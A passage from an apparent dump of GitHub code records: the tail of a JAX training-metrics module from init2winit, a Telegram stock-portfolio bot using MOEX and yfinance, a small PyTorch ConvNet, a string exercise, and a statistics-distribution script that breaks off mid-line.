of\n each of these fields in the optimizer state. If this list is non-empty,\n the metrics state will have a field \"optstate_normsq\" which is a dict\n where each key is a field name in optstate_normsq_fields, and each\n value is a jnp array of length num_time_steps containing the time\n series of the normsq of this optstate field.\n - optstate_sumsq_param_wise_fields (list of str): record the sum of squares \n of each of these fields in the optimizer state parameter wise. \n If this list is non-empty, the metrics state will have a field \n \"optstate_sumsq_param_wise\" which is a dict where each key is a field \n name in optstate_sum_fields, and each value is a pytree of the same type\n as params but with each leaf a jnp array of length num_time_steps \n containing the time series of the sum of this optstate field for this \n parameter.\n - optstate_sum_fields (list of str): record the sum of each of these fields\n in the optimizer state. If this list is non-empty, the metrics state\n will have a field \"optstate_sum\" which is a dict where each key is a\n field name in optstate_sum_fields, and each value is a jnp array\n of length num_time_steps containing the time series of the sum\n of this optstate field.\n - optstate_sum_param_wise_fields (list of str): record the sum of each of \n these fields in the optimizer state parameter wise. If this list is \n non-empty, the metrics state will have a field \n \"optstate_sumsq_param_wise\" which is a dict where each key is a field \n name in optstate_sum_fields, and each value is a pytree of the same type\n as params but with each leaf a jnp array of length num_time_steps \n containing the time series of the sum of this optstate field for this \n parameter.\n - enable_preconditioner_normsq (bool): if true, the metrics state will have\n a field \"preconditioner_normsq\" which is a jnp array of length\n num_train_steps containing a time series of the squared L2 norm of the\n preconditioner. Adaptive optimizers only. See the function\n make_diag_preconditioner() in hessian/precondition.py for more\n info on which optimizers are supported.\n - enable_semip_grad_normsq (bool): if true, the metrics state will have\n a field \"semip_grad_normsq\" which is a jnp array of length\n num_train_steps containing a time series of the squared L2 norm of the\n \"semi-preconditioned\" gradient. Adaptive optimizers only.\n - enable_grafting_norms (bool): if true, the metrics state will have two \n fields \"mag_norms\" and \"dir_norms\" which are pytrees in the shape of the\n model params whose leaves are jnp arrays of length num_train_steps. This\n will only work when you are using the grafting operation through \n the kitchen_sink API.\n\n Args:\n num_train_steps: (int) the number of steps of training. We use this to\n determine the shape of the arrays that store per-step time series.\n hps (ConfigDict): the init2winit hps.\n **config_overrides: optional overrides for the training_metrics configs.\n Config keys which are not overridden will retain their default values.\n\n Returns:\n init_fn: (function) initializes the training metrics state\n update_fn: (function) updates the training metrics state\n summarize_fn: (function): summarizes the training metrics state\n \"\"\"\n\n config = ConfigDict(DEFAULT_CONFIG)\n config.update(config_overrides)\n\n def init_fn(params, batch_stats):\n \"\"\"Initialize the training metrics state.\n\n Args:\n params: (pytree) A pytree of model parameters. Used for its shape\n information.\n batch_stats: (pytree) A pytree of batch stats. Used for its shape\n information.\n\n Returns:\n metrics_state: (pytree): The initial training metrics state. This is\n a pytree whose keys are the different training metrics; many of the\n corresponding values are pytrees of the same shape as the model params,\n though some are just scalars.\n \"\"\"\n metrics_state = {}\n metrics_state['param_norm'] = jnp.zeros(num_train_steps)\n if config['enable_train_cost']:\n metrics_state['train_cost'] = jnp.zeros(num_train_steps)\n if config['enable_param_norms']:\n metrics_state['param_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n if config['enable_batch_stats_norm']:\n metrics_state['batch_stats_norm'] = jnp.zeros(num_train_steps)\n if config['enable_all_batch_stats_norms']:\n metrics_state['all_batch_stats_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), batch_stats)\n if config['enable_gradient_norm']:\n metrics_state['gradient_norm'] = jnp.zeros(num_train_steps)\n if config['enable_all_gradient_norms']:\n metrics_state['all_gradient_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n if config['enable_update_norm']:\n metrics_state['update_norm'] = jnp.zeros(num_train_steps)\n if config['enable_update_norms']:\n metrics_state['update_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n if config['enable_ema']:\n metrics_state['grad_ema'] = jax.tree_map(jnp.zeros_like, params)\n metrics_state['grad_sq_ema'] = jax.tree_map(jnp.zeros_like, params)\n metrics_state['update_ema'] = jax.tree_map(jnp.zeros_like, params)\n metrics_state['update_sq_ema'] = jax.tree_map(jnp.zeros_like, params)\n if config['optstate_sumsq_fields']:\n metrics_state['optstate_sumsq'] = {\n field_name: jnp.zeros(num_train_steps)\n for field_name in config['optstate_sumsq_fields']\n }\n if config['optstate_sumsq_param_wise_fields']:\n metrics_state['optstate_sumsq_param_wise'] = {\n field_name: jax.tree_map(lambda x: jnp.zeros(num_train_steps), params)\n for field_name in config['optstate_sumsq_param_wise_fields']\n }\n if config['optstate_sum_fields']:\n metrics_state['optstate_sum'] = {\n field_name: jnp.zeros(num_train_steps)\n for field_name in config['optstate_sum_fields']\n }\n if config['optstate_sum_param_wise_fields']:\n metrics_state['optstate_sum_param_wise'] = {\n field_name: jax.tree_map(lambda x: jnp.zeros(num_train_steps), params)\n for field_name in config['optstate_sum_param_wise_fields']\n }\n if config['enable_preconditioner_normsq']:\n metrics_state['preconditioner_normsq'] = jnp.zeros(num_train_steps)\n if config['enable_semip_grad_normsq']:\n metrics_state['semip_grad_normsq'] = jnp.zeros(num_train_steps)\n if config['enable_grafting_norms']:\n metrics_state['mag_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n metrics_state['dir_norms'] = jax.tree_map(\n lambda x: jnp.zeros(num_train_steps), params)\n return metrics_state\n\n def update_fn(metrics_state, step, train_cost, grad, old_params, new_params,\n optimizer_state, batch_stats):\n \"\"\"Update the training metrics state.\n\n Args:\n metrics_state: (pytree) The current training metrics state.\n step: (int) the global step of training.\n train_cost: (float) The current train cost.\n grad: (pytree, of same shape as params): The current gradient.\n old_params: (pytree, of same shape as params): The parameters before the\n update.\n new_params: (pytree, of same shape as params): The parameters after the\n update.\n optimizer_state: the optax optimizer state.\n batch_stats: batch stats\n\n Returns:\n next_metrics_state: (pytree) The next training metrics state.\n \"\"\"\n param_norm = jax.tree_map(_compute_leaf_norms, old_params)\n grad_norm = jax.tree_map(_compute_leaf_norms, grad)\n batch_stats_norm = jax.tree_map(_compute_leaf_norms, batch_stats)\n if (config['enable_update_norm'] or config['enable_update_norms'] or\n config['enable_ema']):\n update = jax.tree_map(lambda x, y: x - y, old_params, new_params)\n else:\n update = None\n\n next_metrics_state = {}\n next_metrics_state['param_norm'] = metrics_state['param_norm'].at[\n step].set(total_tree_norm_l2(param_norm))\n if config['enable_train_cost']:\n next_metrics_state['train_cost'] = metrics_state['train_cost'].at[\n step].set(train_cost)\n if config['enable_param_norms']:\n next_metrics_state['param_norms'] = _set_pytree_idx(\n metrics_state['param_norms'], param_norm, step)\n if config['enable_batch_stats_norm']:\n next_metrics_state['batch_stats_norm'] = metrics_state[\n 'batch_stats_norm'].at[step].set(\n total_tree_norm_l2(batch_stats))\n if config['enable_all_batch_stats_norms']:\n next_metrics_state['all_batch_stats_norms'] = _set_pytree_idx(\n metrics_state['all_batch_stats_norms'], batch_stats_norm, step)\n if config['enable_gradient_norm']:\n next_metrics_state['gradient_norm'] = metrics_state['gradient_norm'].at[\n step].set(total_tree_norm_l2(grad))\n if config['enable_all_gradient_norms']:\n next_metrics_state['all_gradient_norms'] = _set_pytree_idx(\n metrics_state['all_gradient_norms'], grad_norm, step)\n if config['enable_update_norm']:\n next_metrics_state['update_norm'] = metrics_state['update_norm'].at[\n step].set(total_tree_norm_l2(update))\n if config['enable_update_norms']:\n update_norm = jax.tree_map(_compute_leaf_norms, update)\n next_metrics_state['update_norms'] = _set_pytree_idx(\n metrics_state['update_norms'], update_norm, step)\n if config['enable_ema']:\n beta = config['ema_beta']\n grad_sq = jax.tree_map(jnp.square, grad)\n update_sq = jax.tree_map(jnp.square, update)\n next_metrics_state['grad_ema'] = _advance_ema(\n metrics_state['grad_ema'], grad, beta)\n next_metrics_state['grad_sq_ema'] = _advance_ema(\n metrics_state['grad_sq_ema'], grad_sq, beta)\n next_metrics_state['update_ema'] = _advance_ema(\n metrics_state['update_ema'], update, beta)\n next_metrics_state['update_sq_ema'] = _advance_ema(\n metrics_state['update_sq_ema'], update_sq, beta)\n if config['optstate_sumsq_fields']:\n next_metrics_state['optstate_sumsq'] = {}\n for field_name in config['optstate_sumsq_fields']:\n field = optimizer_utils.extract_field(optimizer_state, field_name)\n if field is None:\n raise ValueError('optimizer state has no field {}'.format(field_name))\n field_normsq = total_tree_norm_sql2(field)\n next_metrics_state['optstate_sumsq'][field_name] = metrics_state[\n 'optstate_sumsq'][field_name].at[step].set(field_normsq)\n if config['optstate_sumsq_param_wise_fields']:\n next_metrics_state['optstate_sumsq_param_wise'] = {}\n for field_name in config['optstate_sumsq_param_wise_fields']:\n field = optimizer_utils.extract_field(optimizer_state, field_name)\n if field is None:\n raise ValueError('optimizer state has no field {}'.format(field_name))\n field_normsq = jax.tree_map(_compute_leaf_norms, field)\n field_normsqs = jax.tree_map(jnp.square, field_normsq)\n next_metrics_state['optstate_sumsq_param_wise'][field_name] = (\n _set_pytree_idx(\n metrics_state['optstate_sumsq_param_wise'][field_name],\n field_normsqs,\n step,\n )\n )\n if config['optstate_sum_fields']:\n next_metrics_state['optstate_sum'] = {}\n for field_name in config['optstate_sum_fields']:\n field = optimizer_utils.extract_field(optimizer_state, field_name)\n if field is None:\n raise ValueError('optimizer state has no field {}'.format(field_name))\n field_normsq = total_tree_sum(field)\n next_metrics_state['optstate_sum'][field_name] = metrics_state[\n 'optstate_sum'][field_name].at[step].set(field_normsq)\n if config['optstate_sum_param_wise_fields']:\n next_metrics_state['optstate_sum_param_wise'] = {}\n for field_name in config['optstate_sum_param_wise_fields']:\n field = optimizer_utils.extract_field(optimizer_state, field_name)\n if field is None:\n raise ValueError('optimizer state has no field {}'.format(field_name))\n field_sums = jax.tree_map(jnp.sum, field)\n next_metrics_state['optstate_sum_param_wise'][field_name] = (\n _set_pytree_idx(\n metrics_state['optstate_sum_param_wise'][field_name],\n field_sums,\n step,\n )\n )\n if (config['enable_preconditioner_normsq'] or\n config['enable_semip_grad_normsq']):\n preconditioner = freeze(\n make_diag_preconditioner(hps['optimizer'], hps['opt_hparams'],\n optimizer_state, ConfigDict({})))\n if config['enable_preconditioner_normsq']:\n normsq = total_tree_norm_sql2(preconditioner)\n next_metrics_state['preconditioner_normsq'] = metrics_state[\n 'preconditioner_normsq'].at[step].set(normsq)\n if config['enable_semip_grad_normsq']:\n semip_grad = jax.tree_map(lambda g, p: g / (p**0.5),\n grad, preconditioner)\n semip_grad_normsq = total_tree_norm_sql2(semip_grad)\n next_metrics_state['semip_grad_normsq'] = metrics_state[\n 'semip_grad_normsq'].at[step].set(semip_grad_normsq)\n if config['enable_grafting_norms']:\n mag_norm = optimizer_utils.extract_field(optimizer_state, 'mag_norm')\n if mag_norm is None:\n raise ValueError('optimizer state has no field {}'.format('mag_norm'))\n mag_norm = freeze(mag_norm)\n next_metrics_state['mag_norms'] = _set_pytree_idx(\n metrics_state['mag_norms'], mag_norm, step)\n dir_norm = optimizer_utils.extract_field(optimizer_state, 'dir_norm')\n if dir_norm is None:\n raise ValueError('optimizer state has no field {}'.format('dir_norm'))\n dir_norm = freeze(dir_norm)\n next_metrics_state['dir_norms'] = _set_pytree_idx(\n metrics_state['dir_norms'], dir_norm, step)\n\n return next_metrics_state\n\n def summarize_fn(metrics_state):\n \"\"\"Construct a summary tree based on the current training metrics state.\n\n Args:\n metrics_state: (pytree) The current training metrics state.\n\n Returns:\n summary_tree: (pytree) A summary of the training metrics state.\n \"\"\"\n\n # this dict will map from \"summary key\" to \"pytree of same shape as params\"\n summary = {}\n\n summary['param_norm'] = metrics_state['param_norm']\n\n if config['enable_ema']:\n\n def compute_var(first_moment, second_moment):\n return (second_moment - first_moment**2).sum()\n\n summary['grad_var'] = jax.tree_map(compute_var,\n metrics_state['grad_ema'],\n metrics_state['grad_sq_ema'])\n\n summary['update_var'] = jax.tree_map(compute_var,\n metrics_state['update_ema'],\n metrics_state['update_sq_ema'])\n\n summary['update_ratio'] = jax.tree_map(operator.truediv,\n summary['update_var'],\n metrics_state['param_norm'])\n\n # This dict will map from \"summary key\" to \"flattened pytree of same shape\n # as params.\"\n flat_summary = _map_values(model_utils.flatten_dict, summary)\n\n return flat_summary\n\n return init_fn, update_fn, summarize_fn\n\n\ndef _map_values(f, dictionary):\n \"\"\"Create a new dict by mapping all the values in a dict through f.\"\"\"\n return {k: f(v) for (k, v) in dictionary.items()}\n\n\ndef _advance_ema(cur_ema, new_val, beta):\n \"\"\"Advance an exponential moving average.\"\"\"\n return jax.tree_map(lambda cur, new: beta * cur + (1 - beta) * new,\n cur_ema,\n new_val)\n\n\ndef _compute_leaf_norms(pytree):\n \"\"\"Compute the norm of all leaves in a pytree.\"\"\"\n return jax.tree_map(lambda leaf: jnp.linalg.norm(leaf.reshape(-1)), pytree)\n\n\ndef _set_pytree_idx(pytree_of_arrs, new_pytree, idx):\n \"\"\"Incorporate a new pytree into a pytree of arrays.\n\n Args:\n pytree_of_arrs: (pytree) a pytree of float arrays\n new_pytree: (pytree) a pytree of floats\n idx: (int) an index\n\n Returns:\n a pytree where we set the \"idx\" index of each leaf in pytree_of_arrs to\n the corresponding leaf in new_pytree.\n\n \"\"\"\n def set_arr(arr, new_value):\n return arr.at[idx].set(new_value)\n return jax.tree_map(set_arr, pytree_of_arrs, new_pytree)\n","repo_name":"google/init2winit","sub_path":"init2winit/training_metrics_grabber.py","file_name":"training_metrics_grabber.py","file_ext":"py","file_size_in_byte":20676,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"11981790515","text":"import requests\nimport yfinance\nimport sqlite3\nimport os\nfrom datetime import datetime\nfrom aiogram import Bot, Dispatcher, types, executor\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Command\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom dotenv import load_dotenv\nload_dotenv()\n\n\napi_token = os.getenv('API_TOKEN')\nprint(\"api_token:\", api_token)\nbot = Bot(token=api_token)\nstorage = MemoryStorage()\ndp = Dispatcher(bot, storage=storage)\n\nclass User:\n def __init__(self, telegram_id):\n self.telegram_id = telegram_id\n\n def check_user_data(self):\n conn = sqlite3.connect('./app_data/database.db')\n cursor = conn.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='users'\")\n result = cursor.fetchone()\n if result is None:\n conn.close()\n return None\n cursor.execute('SELECT * FROM users WHERE telegram_id = ?', (self.telegram_id,))\n result = cursor.fetchone()\n conn.close()\n return result\n\n def create_user_record(self):\n inserted_id = None\n if not self.check_user_data():\n conn = sqlite3.connect('./app_data/database.db')\n cursor = conn.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS users (telegram_id INTEGER PRIMARY KEY)''')\n cursor.execute('INSERT INTO users (telegram_id) VALUES (?)', (self.telegram_id,))\n inserted_id = cursor.lastrowid\n conn.commit()\n conn.close() \n return inserted_id\n\nclass Stock:\n def __init__(self, owner_id, stock_id, quantity, unit_price, purchase_date):\n self.owner_id = owner_id\n self.stock_id = stock_id\n self.quantity = quantity\n self.unit_price = unit_price\n self.purchase_date = purchase_date\n \n def __eq__(self, other):\n if isinstance(other, Stock):\n return (\n self.owner_id == other.owner_id\n and self.stock_id == other.stock_id\n and self.quantity == other.quantity\n and self.unit_price == other.unit_price\n and self.purchase_date == other.purchase_date\n )\n return False\n\n def add_stock(self):\n conn = sqlite3.connect('./app_data/database.db')\n cursor = conn.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS stocks\n (owner_id INTEGER, stock_id TEXT, quantity INTEGER, unit_price REAL, purchase_date TIMESTAMP, FOREIGN KEY (owner_id) REFERENCES users(telegram_id) ON DELETE CASCADE)''')\n values = (self.owner_id, self.stock_id, self.quantity, self.unit_price, self.purchase_date)\n cursor.execute('INSERT INTO stocks VALUES (?, ?, ?, ?, ?)', values)\n inserted_id = cursor.lastrowid\n conn.commit()\n conn.close()\n return inserted_id\n\n def get_user_stocks(owner_id):\n stocks = []\n conn = sqlite3.connect('./app_data/database.db')\n cursor = conn.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name='stocks'\")\n result = cursor.fetchone()\n if result is None:\n conn.close()\n return stocks\n cursor.execute('SELECT * FROM stocks WHERE owner_id = ?', (owner_id,))\n result = cursor.fetchall()\n conn.close()\n\n for row in result:\n owner_id, stock_id, quantity, unit_price, purchase_date = row\n stock = Stock(owner_id, stock_id, quantity, unit_price, purchase_date)\n stocks.append(stock)\n\n return stocks\n\nclass CheckStockStates(StatesGroup):\n StockID = State()\n\nclass AddStockStates(StatesGroup):\n StockID = State()\n StockPrice = State()\n StockQuantity = State()\n\ndef check_stock_existence(stock_id: str) -> bool:\n url = f\"https://iss.moex.com/iss/securities/{stock_id}.json\"\n \n response = requests.get(url)\n if response.status_code == 200:\n data = response.json()\n exists = data.get(\"boards\", {}).get(\"data\", [])\n return bool(exists)\n else:\n return False\n\ndef get_stock_price_ru(stock_id: str) -> float:\n url = f\"https://iss.moex.com/iss/engines/stock/markets/shares/boards/TQBR/securities/{stock_id}.json?iss.only=securities&securities.columns=PREVPRICE,CURRENCYID\"\n\n response = requests.get(url)\n if response.status_code == 200:\n data = response.json()\n if len(data.get(\"securities\", {}).get(\"data\", [[]])) > 0:\n stock_currency = data.get(\"securities\", {}).get(\"data\", [[]])[0][1]\n if stock_currency == 'SUR':\n stock_currency = 'RUB'\n stock_price = data.get(\"securities\", {}).get(\"data\", [[]])[0][0]\n stock_result = str(stock_price) + ' ' + str(stock_currency)\n return stock_result\n else:\n return None\n else:\n return None\n\ndef get_stock_price_world(stock_id):\n ticker = yfinance.Ticker(stock_id)\n stock_info = ticker.info\n stock_currency = stock_info['currency']\n stock_price = stock_info.get('currentPrice')\n stock_result = str(stock_price) + ' ' + str(stock_currency)\n if stock_price is not None:\n return stock_result\n else:\n return None\n\n@dp.message_handler(Command('start'))\nasync def reg_user(message: types.Message):\n new_user = User(message.from_user.id)\n new_user.create_user_record()\n await message.reply('Добро пожаловать!')\n\n@dp.message_handler(Command('checkStock'))\nasync def check_stock_start(message: types.Message):\n await message.reply('Введите идентификатор ценной бумаги')\n await CheckStockStates.StockID.set()\n\n@dp.message_handler(state=CheckStockStates.StockID)\nasync def check_stock_id(message: types.Message, state: FSMContext):\n stock_id = message.text.upper()\n\n stock_exists = check_stock_existence(stock_id)\n if stock_exists is not False:\n stock_price = get_stock_price_ru(stock_id)\n if stock_price is not None:\n await message.reply(f\"Ценная бумага с идентификатором {stock_id} существует на Московской бирже. Текущий курс: {stock_price}\")\n else:\n stock_price = get_stock_price_world(stock_id)\n if stock_price is not None:\n await message.reply(f\"Ценная бумага с идентификатором {stock_id} существует на Yahoo! Finance. Текущий курс: {stock_price}\")\n else:\n await message.reply(f\"Ценная бумага с идентификатором {stock_id} существует на Московской бирже, но не продается ни в России, ни за рубежом\")\n else:\n await message.reply(f\"Ценная бумага с идентификатором {stock_id} не найдена ни на Московской бирже, ни на Yahoo! Finance.\")\n\n await state.finish()\n\n@dp.message_handler(Command('addStock'))\nasync def check_stock_start(message: types.Message):\n await message.reply('Преступим к добавлению ценной бумаги')\n await bot.send_message(message.chat.id, 'Введите идентификатор приобретенного инструмента')\n await AddStockStates.StockID.set()\n\n@dp.message_handler(state=AddStockStates.StockID)\nasync def add_stock_id(message: types.Message, state: FSMContext):\n if message.text != \"/stop\" and message.text != \"/STOP\":\n stock_exists = check_stock_existence(message.text)\n if stock_exists is not False:\n await bot.send_message(message.chat.id, 'Введите стоимость единицы ценной бумаги')\n async with state.proxy() as data:\n data['StockID'] = message.text\n await AddStockStates.StockPrice.set()\n else:\n await message.reply('Указанный иденификатор ценной бумаги не найден ни на Московской бирже, ни на Yahoo! Finance.')\n await bot.send_message(message.chat.id, 'Введите корректный идентификатор приобретенного инструмента или введите /stop для отмены')\n else:\n await state.finish()\n await message.reply('Добавление информации о приобретенной ценной бумаге отменено')\n\n@dp.message_handler(state=AddStockStates.StockPrice)\nasync def add_stock_id(message: types.Message, state: FSMContext):\n if message.text != '/stop' and message.text != '/STOP':\n try:\n float(message.text.replace(',', '.'))\n await bot.send_message(message.chat.id, 'Введите количество приобретенных единиц инструмента')\n async with state.proxy() as data:\n data['StockPrice'] = message.text.replace(',', '.')\n await AddStockStates.StockQuantity.set()\n except:\n await message.reply('Вы некорректно указали стоимость одной ценной бумаги.')\n await bot.send_message(message.chat.id, 'Введите стоимость приобретения в числовом формате или введите /stop для отмены\"')\n \n else:\n await state.finish()\n await message.reply('Добавление информации о приобретенной ценной бумаге отменено')\n\n@dp.message_handler(state=AddStockStates.StockQuantity)\nasync def add_stock_id(message: types.Message, state: FSMContext):\n if message.text != \"/stop\" and message.text != \"/STOP\":\n try:\n int(message.text)\n async with state.proxy() as data:\n data['StockQuantity'] = message.text\n data['StockOwnerID'] = message.from_user.id\n data['StockPurchaseDate'] = datetime.now()\n StockRecord = Stock(data['StockOwnerID'], data['StockID'], data['StockPrice'], data['StockQuantity'], data['StockPurchaseDate'])\n StockRecord.add_stock()\n await state.finish()\n await bot.send_message(message.chat.id, 'Информация о приобретенной ценной бумаге успешно сохранена!')\n except:\n await message.reply('Вы некорректно указали количество приобретенных единиц ценной бумаги.')\n await bot.send_message(message.chat.id, 'Введите количество в виде целого числа или введите /stop для отмены\"')\n \n else:\n await state.finish()\n await message.reply('Добавление информации о приобретенной ценной бумаге отменено')\n\n@dp.message_handler(Command('checkPortfolioSummary'))\nasync def check_portfolio(message: types.Message):\n user_stocks = Stock.get_user_stocks(message.from_user.id)\n portfolio_price = 0\n portfolio_stocks_count = 0\n for stock in user_stocks:\n stock_price = int(stock.quantity) * float(stock.unit_price)\n portfolio_price += stock_price\n portfolio_stocks_count += 1\n await message.reply(f'Вы приобрели {portfolio_stocks_count} раз, на общую сумму {portfolio_price} RUB')\n\n@dp.message_handler(Command('test'))\nasync def test(message: types.Message):\n return_message = User(message.from_user.id).check_user_data()\n await message.reply(return_message)\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)\n\n","repo_name":"MalyshkoA/chat-bot-mipt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"919609372","text":"from torchvision import models\nfrom torch import nn\nimport torch.nn.functional as F\n\n'''\nA simple convnet class for early testing\n'''\nclass ConvNet(nn.Module):\n def __init__(self):\n super(ConvNet, self).__init__()\n\n # Input channels = 3, output channels = 18\n self.conv1 = nn.Conv2d(3, 144, kernel_size=3, stride=1, padding=1)\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n\n # 4608 input features, 64 output features (see sizing flow below)\n self.fc1 = nn.Linear(12960000, 64)\n\n # 64 input features, 10 output features for our 10 defined classes\n\n self.fc2 = nn.Linear(64, 2)\n\n def forward(self, x):\n # Computes the activation of the first convolution\n # Size changes from (3, 32, 32) to (18, 32, 32)\n x = F.relu(self.conv1(x))\n\n # Size changes from (18, 32, 32) to (18, 16, 16)\n #x = self.pool(x)\n\n # Reshape data to input to the input layer of the neural net\n # Size changes from (18, 16, 16) to (1, 4608)\n # Recall that the -1 infers this dimension from the other given dimension\n x = x.view(-1, 12960000)\n\n # Computes the activation of the first fully connected layer\n # Size changes from (1, 12960000) to (1, 64)\n x = F.relu(self.fc1(x))\n\n # Computes the second fully connected layer (activation applied later)\n # Size changes from (1, 64) to (1, 10)\n x = self.fc2(x)\n\n return x","repo_name":"svapili/FS2019_ATML_Group2","sub_path":"scripts/SimpleNet.py","file_name":"SimpleNet.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17042374539","text":"quantity = int(input())\nstrings = []\nfor i in range(quantity):\n string = input()\n strings.append(string)\nindex = int(input())\nnew_word = ''\nfor i in strings:\n new_word += i[index - 1]\nprint(new_word)","repo_name":"Sepren/Yandex_School_Newbie","sub_path":"lists_classwork/classwork/lab_3.py","file_name":"lab_3.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2122294921","text":"import random\nimport math\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nimport numpy as np\n\ndef getUnif(a:int, b:int):\n alpha = random.random()\n return (b-a) * alpha + a\n\ndef MandD(lis: list):\n\ttemp = list()\n\tfor i in lis:\n\t temp.append(i**2)\n\tM = sum(lis)/10000\n\tprint(\"M = \" + (str) (M))\n\tD = sum(temp)/10000 - M**2\n\tprint(\"D = \" + (str) (D))\n\ndef getExp(beta: float):\n\treturn -beta * math.log(random.random())\n\ndef getP(a:int, b:int, source:list, size:int):\n\ttemp = sorted(source)\n\tk = 0\n\tsumk = 0\n\tj = a + 1\n\tr_values = list()\n\twhile j != b:\n\t\tif(temp[k] <= j):\n\t\t\tk = k + 1\n\t\t\tsumk = sumk + 1\n\t\telse:\n\t\t\tj = j + 1\n\t\t\tr_values.append(sumk/size)\n\t\t\tsumk = 0\n\t\t\t#continue\n\tfor i in range(size - k):\n\t\tsumk = sumk + 1\n\tr_values.append(sumk/size)\n\treturn r_values\n\ndef getPlotP(source:list, size:int, length:int):\n\tlistY = list()\n\tlistX = list()\n\ttemp = sorted(source)\n\tfor i in range(size):\n\t\tlistY.append(i / size)\n\t\tlistX.append(temp[i])\n\treturn [listX, listY]\n\ndef getXi(N:int):\n\tresult = 0\n\tfor i in range(N):\n\t\tresult = result + getStand2()**2\n\treturn result\n\ndef getStand1():\n\tsum = 0\n\tfor i in range(12):\n\t\talpha = random.random()\n\t\tsum = sum + alpha\n\treturn sum - 6\n\ndef getStand2():\n\talpha = random.random()\n\tbeta = random.random()\n\treturn math.sqrt(-2*math.log(beta)) * math.cos(2*math.pi*(alpha))\n\ndef getStud(N:int):\n\treturn getStand2() / (math.sqrt(getXi(N)/N))\n\nunifList = list()\nfor i in range(10000):\n\tunifList.append(getUnif(0,10))\n\ntask = list()\nfor i in range(20):\n\ttask.append(np.random.normal(3,2))\n\tprint(task[i])\nm = sum(task)/20\ntempTask = list()\nfor i in range(20):\n\ttempTask.append((task[i] - m)**2)\ngDisp = sum(tempTask)/20\ndisp = math.sqrt(20/19 * gDisp)\nprint(disp)\ninterval = 1.7291*disp/math.sqrt(20)\nprint(\"interval: %.2f\" % (m - interval) + \" < m < %.2f\" % (m + interval))\nMandD(unifList)\nplt.bar(['0-1','1-2','2-3','3-4','4-5','5-6','6-7','7-8','8-9','9-10'], getP(0,10,unifList,10000))\nplt.show()\npoly = interpolate.KroghInterpolator([0,1,2,3,4,5,6,7,8,9], getP(0,10,unifList,10000))\nY = poly([0,1,2,3,4,5,6,7,8,9])\nplt.plot([0,1,2,3,4,5,6,7,8,9],Y)\nax = plt.gca()\nax.set_xlim([0, 10])\nax.set_ylim([0, 0.2])\nplt.show()\nX, Y = getPlotP(unifList, 10000, 10)\nplt.plot(X, Y)\nplt.show()\n\nstandList = list()\nstandList1 = list()\nfor i in range(10000):\n\tstandList.append(getStand1())\n\tstandList1.append(getStand2())\nMandD(standList)\nMandD(standList1)\ntemp = getP(((int)(min(standList1))), ((int)(max(standList1))), standList1, 10000)\nX.clear()\nfor i in range(len(temp)):\n\tX.append((str)((int)(min(standList1)) + i) + ' - ' + ((str)((int)(min(standList1)) + i + 1)))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nX.append(len(temp)/2*-1)\nfor i in range(len(temp) - 1):\n\tX.append(temp[0] + i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.7])\nplt.show()\nX.clear()\nX, Y = getPlotP(standList1, 10000, 8)\nplt.plot(X, Y)\nplt.show()\ntemp = getP(((int)(min(standList))), ((int)(max(standList))), standList, 10000)\nX.clear()\nfor i in range(len(temp)):\n\tX.append((str)((int)(min(standList)) + i) + ' - ' + ((str)((int)(min(standList)) + i + 1)))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nX.append(len(temp)/2*-1)\nfor i in range(len(temp) - 1):\n\tX.append(temp[0] + i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.7])\nplt.show()\nX.clear()\nX, Y = getPlotP(standList, 10000, 8)\nplt.plot(X, Y)\nplt.show()\nexpList = list()\nprint('expList')\nfor i in range(10000):\n\texpList.append(getExp(1))\nMandD(expList)\ntemp = getP(0,(int)(max(expList)),expList,10000)\nX.clear()\nfor i in range(len(temp)):\n\tX.append((str)((int)(min(expList)) + i) + ' - ' + ((str)((int)(min(expList)) + i + 1)))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nfor i in range((int)(max(expList))):\n\tX.append(i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = plt.gca()\nax.set_xlim([X[0], X[len(X) - 1]])\nax.set_ylim([0, 0.7])\nplt.show()\nX, Y = getPlotP(expList, 10000, (int)(max(expList)))\nplt.plot(X,Y)\nplt.show()\nlistXi = list()\nfor i in range(10000):\n\tlistXi.append(getXi(10))\nMandD(listXi)\nsupressedMax = (int)(max(listXi))\ntemp = getP(0,supressedMax,listXi,10000)\nX.clear()\n\nfor i in range(supressedMax):\n\tX.append((str)(i) + ' - ' + (str)(i + 1))\nplt.bar(X, temp)\nplt.show()\nX.clear()\nfor i in range(supressedMax):\n\tX.append(i)\npoly = interpolate.KroghInterpolator(X, temp)\nY = poly(X)\nplt.plot(X,Y)\nax = 